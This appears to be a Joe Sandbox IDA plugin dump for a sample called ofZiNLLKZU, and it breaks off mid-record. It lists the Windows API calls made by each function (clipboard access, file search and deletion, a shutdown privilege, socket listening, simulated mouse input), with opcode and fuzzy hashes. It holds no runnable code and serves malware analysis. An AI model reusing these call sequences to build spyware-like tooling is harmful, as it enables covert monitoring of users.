                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                • String ID:
                                                                                • API String ID: 4175595110-0
                                                                                • Opcode ID: 12c83720e8e00fc83924e3d8111d8d25efcc1bd2163ddcbc84686daa92d2e278
                                                                                • Instruction ID: 3fe3ebe5700566fdbae06e2c2512b7f630f3432c1e2f1fa1433c65f8864b001d
                                                                                • Opcode Fuzzy Hash: 12c83720e8e00fc83924e3d8111d8d25efcc1bd2163ddcbc84686daa92d2e278
                                                                                • Instruction Fuzzy Hash: 9B715B7290020AABEF10DFA4DC44FEEBBBABF09310F144555E955A7291D7B1A909CBA0
                                                                                APIs
                                                                                • OpenClipboard.USER32(0066CC08), ref: 0064EB29
                                                                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 0064EB37
                                                                                • GetClipboardData.USER32(0000000D), ref: 0064EB43
                                                                                • CloseClipboard.USER32 ref: 0064EB4F
                                                                                • GlobalLock.KERNEL32(00000000), ref: 0064EB87
                                                                                • CloseClipboard.USER32 ref: 0064EB91
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0064EBBC
                                                                                • IsClipboardFormatAvailable.USER32(00000001), ref: 0064EBC9
                                                                                • GetClipboardData.USER32(00000001), ref: 0064EBD1
                                                                                • GlobalLock.KERNEL32(00000000), ref: 0064EBE2
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0064EC22
                                                                                • IsClipboardFormatAvailable.USER32(0000000F), ref: 0064EC38
                                                                                • GetClipboardData.USER32(0000000F), ref: 0064EC44
                                                                                • GlobalLock.KERNEL32(00000000), ref: 0064EC55
                                                                                • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0064EC77
                                                                                • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0064EC94
                                                                                • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0064ECD2
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0064ECF3
                                                                                • CountClipboardFormats.USER32 ref: 0064ED14
                                                                                • CloseClipboard.USER32 ref: 0064ED59
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                • String ID:
                                                                                • API String ID: 420908878-0
                                                                                • Opcode ID: 612d7e3d91fe67673ddf86a10d477c8e0087c8cd2d208a93f8a3228d8fe6d557
                                                                                • Instruction ID: 47bee5303fc66d92afb3edd68c3ed9271ee8b72b3d100fd33ca8d25e6e37c2d9
                                                                                • Opcode Fuzzy Hash: 612d7e3d91fe67673ddf86a10d477c8e0087c8cd2d208a93f8a3228d8fe6d557
                                                                                • Instruction Fuzzy Hash: 6561AD342042429FD310EF24D898F7A7BA6FF84714F14551AF896973A1DB72ED06CBA2
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 006469BE
                                                                                • FindClose.KERNEL32(00000000), ref: 00646A12
                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00646A4E
                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00646A75
                                                                                  • Part of subcall function 005D9CB3: _wcslen.LIBCMT ref: 005D9CBD
                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00646AB2
                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00646ADF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                • API String ID: 3830820486-3289030164
                                                                                • Opcode ID: b5cd32087490afa228f325bf244e04aa7b5d33f3a20e08cf15912bc177f3df6f
                                                                                • Instruction ID: 0c9f2d783f297dcfc4ed10a529389818868d0b9cad60c54918f3eba5ea83bfe6
                                                                                • Opcode Fuzzy Hash: b5cd32087490afa228f325bf244e04aa7b5d33f3a20e08cf15912bc177f3df6f
                                                                                • Instruction Fuzzy Hash: 9BD16F72508341AFC314EBA4C895EABBBECBFC8704F44491EF585C6291EB74DA44CB62
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 00649663
                                                                                • GetFileAttributesW.KERNEL32(?), ref: 006496A1
                                                                                • SetFileAttributesW.KERNEL32(?,?), ref: 006496BB
                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 006496D3
                                                                                • FindClose.KERNEL32(00000000), ref: 006496DE
                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 006496FA
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0064974A
                                                                                • SetCurrentDirectoryW.KERNEL32(00696B7C), ref: 00649768
                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00649772
                                                                                • FindClose.KERNEL32(00000000), ref: 0064977F
                                                                                • FindClose.KERNEL32(00000000), ref: 0064978F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                • String ID: *.*
                                                                                • API String ID: 1409584000-438819550
                                                                                • Opcode ID: dc8211706c0f2e05ba1743838eaa4f09f44c177b6a9fa423632edcf6bbbaa5de
                                                                                • Instruction ID: dccbf2f0e899cc2ed822244c73b5075354a267c00b0f4b2cd265f9505616490e
                                                                                • Opcode Fuzzy Hash: dc8211706c0f2e05ba1743838eaa4f09f44c177b6a9fa423632edcf6bbbaa5de
                                                                                • Instruction Fuzzy Hash: 2D31D3326806196EDF14EFB4DC18AEF77AEAF49320F104156F955E2290EB74DE40CB64
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 006497BE
                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00649819
                                                                                • FindClose.KERNEL32(00000000), ref: 00649824
                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 00649840
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00649890
                                                                                • SetCurrentDirectoryW.KERNEL32(00696B7C), ref: 006498AE
                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 006498B8
                                                                                • FindClose.KERNEL32(00000000), ref: 006498C5
                                                                                • FindClose.KERNEL32(00000000), ref: 006498D5
                                                                                  • Part of subcall function 0063DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0063DB00
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                • String ID: *.*
                                                                                • API String ID: 2640511053-438819550
                                                                                • Opcode ID: 22c73ee327c5ee2ad7168a4e2eddc31f9571e0d65127d95204d4677e439c84fe
                                                                                • Instruction ID: b7be0c1296b64d8192ab9bbf70c157fafca593fcc87e30e5fcdbb9db4f77425d
                                                                                • Opcode Fuzzy Hash: 22c73ee327c5ee2ad7168a4e2eddc31f9571e0d65127d95204d4677e439c84fe
                                                                                • Instruction Fuzzy Hash: A831D4315806196EDF10EFB8EC48AEF77AEAF46330F104556F950A2290EB70DA45CB74
                                                                                APIs
                                                                                • GetLocalTime.KERNEL32(?), ref: 00648257
                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00648267
                                                                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00648273
                                                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00648310
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00648324
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00648356
                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0064838C
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00648395
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentDirectoryTime$File$Local$System
                                                                                • String ID: *.*
                                                                                • API String ID: 1464919966-438819550
                                                                                • Opcode ID: 38fddf497338e15e997010a79fc11a1026a8431e60239df5e1a46fee31714846
                                                                                • Instruction ID: f55c88f2284332787ba9a84c11da9900f8cda15ffcbbe8bc0255b65302287a36
                                                                                • Opcode Fuzzy Hash: 38fddf497338e15e997010a79fc11a1026a8431e60239df5e1a46fee31714846
                                                                                • Instruction Fuzzy Hash: A56158725043069FCB10EF64C8449AFB7EAFF89310F04891EF98997251EB31EA45CB92
                                                                                APIs
                                                                                  • Part of subcall function 005D3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,005D3A97,?,?,005D2E7F,?,?,?,00000000), ref: 005D3AC2
                                                                                  • Part of subcall function 0063E199: GetFileAttributesW.KERNEL32(?,0063CF95), ref: 0063E19A
                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0063D122
                                                                                • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0063D1DD
                                                                                • MoveFileW.KERNEL32(?,?), ref: 0063D1F0
                                                                                • DeleteFileW.KERNEL32(?,?,?,?), ref: 0063D20D
                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 0063D237
                                                                                  • Part of subcall function 0063D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0063D21C,?,?), ref: 0063D2B2
                                                                                • FindClose.KERNEL32(00000000,?,?,?), ref: 0063D253
                                                                                • FindClose.KERNEL32(00000000), ref: 0063D264
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                • String ID: \*.*
                                                                                • API String ID: 1946585618-1173974218
                                                                                • Opcode ID: defe37601f66f21ffa16956d382e21e16c5e307f37c8f210e6c871957b5c3448
                                                                                • Instruction ID: 2a561cbd6c815ab87db4251965b4054bc5672936f2c42b456f0e7220d24929b1
                                                                                • Opcode Fuzzy Hash: defe37601f66f21ffa16956d382e21e16c5e307f37c8f210e6c871957b5c3448
                                                                                • Instruction Fuzzy Hash: 2861803190110E9BCF15EBE4E9569EEBB7ABF95300F244066E40173291EB315F09DBA1
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                • String ID:
                                                                                • API String ID: 1737998785-0
                                                                                • Opcode ID: efd56f7fb2e3db2d71a19d7dd3897c34e225da99b52342f82d85e42cb7284985
                                                                                • Instruction ID: 07f29886a190ce82b9a029f3f036c314497761e1415cc60c82052bd774da4844
                                                                                • Opcode Fuzzy Hash: efd56f7fb2e3db2d71a19d7dd3897c34e225da99b52342f82d85e42cb7284985
                                                                                • Instruction Fuzzy Hash: D741CE35604652AFD720DF15D888B69BBE6FF44328F14C09AE455CB762C776EC42CB90
                                                                                APIs
                                                                                  • Part of subcall function 006316C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0063170D
                                                                                  • Part of subcall function 006316C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0063173A
                                                                                  • Part of subcall function 006316C3: GetLastError.KERNEL32 ref: 0063174A
                                                                                • ExitWindowsEx.USER32(?,00000000), ref: 0063E932
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                • String ID: $ $@$SeShutdownPrivilege
                                                                                • API String ID: 2234035333-3163812486
                                                                                • Opcode ID: b907bfe8b454cf97a7faed6e6471bfa248dfa3b607d7e358968d7257253ae526
                                                                                • Instruction ID: d75076d318b3fbd88b8c801e9b9378b735074f14f44e07e014bb5a1d0aeb4ed0
                                                                                • Opcode Fuzzy Hash: b907bfe8b454cf97a7faed6e6471bfa248dfa3b607d7e358968d7257253ae526
                                                                                • Instruction Fuzzy Hash: 8E01F972610211AFEB5426B49C86FFF725E9714761F154426FD03F21D1D6A25C4083F4
                                                                                APIs
                                                                                • socket.WSOCK32(00000002,00000001,00000006), ref: 00651276
                                                                                • WSAGetLastError.WSOCK32 ref: 00651283
                                                                                • bind.WSOCK32(00000000,?,00000010), ref: 006512BA
                                                                                • WSAGetLastError.WSOCK32 ref: 006512C5
                                                                                • closesocket.WSOCK32(00000000), ref: 006512F4
                                                                                • listen.WSOCK32(00000000,00000005), ref: 00651303
                                                                                • WSAGetLastError.WSOCK32 ref: 0065130D
                                                                                • closesocket.WSOCK32(00000000), ref: 0065133C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                • String ID:
                                                                                • API String ID: 540024437-0
                                                                                • Opcode ID: adafe00be47bbda7f7ae499d4a52ecd00af805c64226e467f119ca4523aa52d5
                                                                                • Instruction ID: 2717898f450db9a16b96adfb5d17e82d766ec30a55c5a71f31c4554790dd634b
                                                                                • Opcode Fuzzy Hash: adafe00be47bbda7f7ae499d4a52ecd00af805c64226e467f119ca4523aa52d5
                                                                                • Instruction Fuzzy Hash: 5241A2316001019FD720DF28C498B69BBE6BF86329F18818DD8568F392C771ED86CBE1
                                                                                APIs
                                                                                • _free.LIBCMT ref: 0060B9D4
                                                                                • _free.LIBCMT ref: 0060B9F8
                                                                                • _free.LIBCMT ref: 0060BB7F
                                                                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00673700), ref: 0060BB91
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,006A121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0060BC09
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,006A1270,000000FF,?,0000003F,00000000,?), ref: 0060BC36
                                                                                • _free.LIBCMT ref: 0060BD4B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                • String ID:
                                                                                • API String ID: 314583886-0
                                                                                • Opcode ID: 7e1a9722d2a10782bc8b9de4f3540f9c18fdd406530444e90100353e7755093c
                                                                                • Instruction ID: 543c063723d0ece424cb26de6455420c91a8d63577086ff5e5ff498f3374553e
                                                                                • Opcode Fuzzy Hash: 7e1a9722d2a10782bc8b9de4f3540f9c18fdd406530444e90100353e7755093c
                                                                                • Instruction Fuzzy Hash: B7C13971A842059FDB1CAF688C51BEBBBABEF42310F18A55EE490D73D1DB309E418B54
APIs
  • Part of subcall function 005D3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,005D3A97,?,?,005D2E7F,?,?,?,00000000), ref: 005D3AC2
  • Part of subcall function 0063E199: GetFileAttributesW.KERNEL32(?,0063CF95), ref: 0063E19A
• FindFirstFileW.KERNEL32(?,?), ref: 0063D420
• DeleteFileW.KERNEL32(?,?,?,?), ref: 0063D470
• FindNextFileW.KERNEL32(00000000,00000010), ref: 0063D481
• FindClose.KERNEL32(00000000), ref: 0063D498
• FindClose.KERNEL32(00000000), ref: 0063D4A1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
• Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
Similarity
• API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
• String ID: \*.*
• API String ID: 2649000838-1173974218
• Opcode ID: 2200bc6b9193d55ceccb38a59298a32e83e194fe9af5eea48647452e47f478a1
• Instruction ID: 327a77b33d7112b9130b8b8b40944b96136f81b1d59305ead39fb2201c10f6c4
• Opcode Fuzzy Hash: 2200bc6b9193d55ceccb38a59298a32e83e194fe9af5eea48647452e47f478a1
• Instruction Fuzzy Hash: B93152710083459BC315EF64D8558AF7BE9BED1314F44491FF4D193291EB30AA09D7A3
APIs
Strings
Similarity
• API ID: __floor_pentium4
• String ID: 1#IND$1#INF$1#QNAN$1#SNAN
• API String ID: 4168288129-2761157908
• Opcode ID: 184f87ea2842a0f540750ba96c2fbdf345601e3b7664349357f94cc3f71cca41
• Instruction ID: dd4d93f26be35c409a7a956e2b8f994f18382fd835de9266b633c583fdfce65d
• Opcode Fuzzy Hash: 184f87ea2842a0f540750ba96c2fbdf345601e3b7664349357f94cc3f71cca41
• Instruction Fuzzy Hash: 66C23A71E446298FDB39CF289D407EAB7B6EB44304F1445EAD44EE7281E779AE818F40
APIs
• _wcslen.LIBCMT ref: 006464DC
• CoInitialize.OLE32(00000000), ref: 00646639
• CoCreateInstance.OLE32(0066FCF8,00000000,00000001,0066FB68,?), ref: 00646650
• CoUninitialize.OLE32 ref: 006468D4
Strings
Similarity
• API ID: CreateInitializeInstanceUninitialize_wcslen
• String ID: .lnk
• API String ID: 886957087-24824748
• Opcode ID: efd5d40ba9611728f23bf19a9b6ca0d603bad0d1ac524f0f0329f501040c130a
• Instruction ID: c9f8540c17f03ac503a36d68ee2d46cb817ba09ba7b46cc8f2a8c32a85409b77
• Opcode Fuzzy Hash: efd5d40ba9611728f23bf19a9b6ca0d603bad0d1ac524f0f0329f501040c130a
• Instruction Fuzzy Hash: 62D13A715082029FC314DF28C8859ABBBE9FFD9704F40496EF5958B2A1EB71ED05CB92
APIs
• GetForegroundWindow.USER32(?,?,00000000), ref: 006522E8
  • Part of subcall function 0064E4EC: GetWindowRect.USER32(?,?), ref: 0064E504
• GetDesktopWindow.USER32 ref: 00652312
• GetWindowRect.USER32(00000000), ref: 00652319
• mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00652355
• GetCursorPos.USER32(?), ref: 00652381
• mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 006523DF
Similarity
• API ID: Window$Rectmouse_event$CursorDesktopForeground
• String ID:
• API String ID: 2387181109-0
• Opcode ID: 3da2a8c3d5cce6481f92b5ba6b232c1c3c26cf3e9be5ef0eea858efe30a0c4f4
• Instruction ID: a702c37791fdc16a9fd16d9ff2c0f27bfb36fbc001b04158e9d1df689c2a77f5
• Opcode Fuzzy Hash: 3da2a8c3d5cce6481f92b5ba6b232c1c3c26cf3e9be5ef0eea858efe30a0c4f4
• Instruction Fuzzy Hash: 4831CF72504716ABC720DF54CC45BABBBAAFF85314F00091DF98597291DB75EA08CB92
APIs
  • Part of subcall function 005D9CB3: _wcslen.LIBCMT ref: 005D9CBD
• FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00649B78
• FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00649C8B
  • Part of subcall function 00643874: GetInputState.USER32 ref: 006438CB
  • Part of subcall function 00643874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00643966
• Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00649BA8
• FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00649C75
Strings
Similarity
• API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
• String ID: *.*
• API String ID: 1972594611-438819550
• Opcode ID: da230f8ff5f2d504ab973647a6f4812f1f25cce61384a3ffdc32bd27a2cd0acd
• Instruction ID: ea2b32c24ad05f8f08545efe4f9f5af9f8b896d11e157c1db5fe49d5410c4ce4
• Opcode Fuzzy Hash: da230f8ff5f2d504ab973647a6f4812f1f25cce61384a3ffdc32bd27a2cd0acd
• Instruction Fuzzy Hash: C641817198060A9FCF14DF64C989AEFBBBAFF45310F244156F805A2291EB309E44CF61
APIs
  • Part of subcall function 005E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 005E9BB2
• DefDlgProcW.USER32(?,?,?,?,?), ref: 005E9A4E
• GetSysColor.USER32(0000000F), ref: 005E9B23
• SetBkColor.GDI32(?,00000000), ref: 005E9B36
Similarity
• API ID: Color$LongProcWindow
• String ID:
• API String ID: 3131106179-0
• Opcode ID: fed453fd958ca4e90b44c1a4bdff3972076b7aaf30e9a57d3be5852134e9b186
• Instruction ID: f64f9067f9a3e9f0ce982d03fccfa0910c421cb24ecab851fb2dc03c97c8087a
• Opcode Fuzzy Hash: fed453fd958ca4e90b44c1a4bdff3972076b7aaf30e9a57d3be5852134e9b186
• Instruction Fuzzy Hash: F8A12BB01089A4BEE72CAA3E9C58DBB2E5FFF83344F140519F482DA691CA259D01D676
APIs
  • Part of subcall function 0065304E: inet_addr.WSOCK32(?), ref: 0065307A
  • Part of subcall function 0065304E: _wcslen.LIBCMT ref: 0065309B
• socket.WSOCK32(00000002,00000002,00000011), ref: 0065185D
• WSAGetLastError.WSOCK32 ref: 00651884
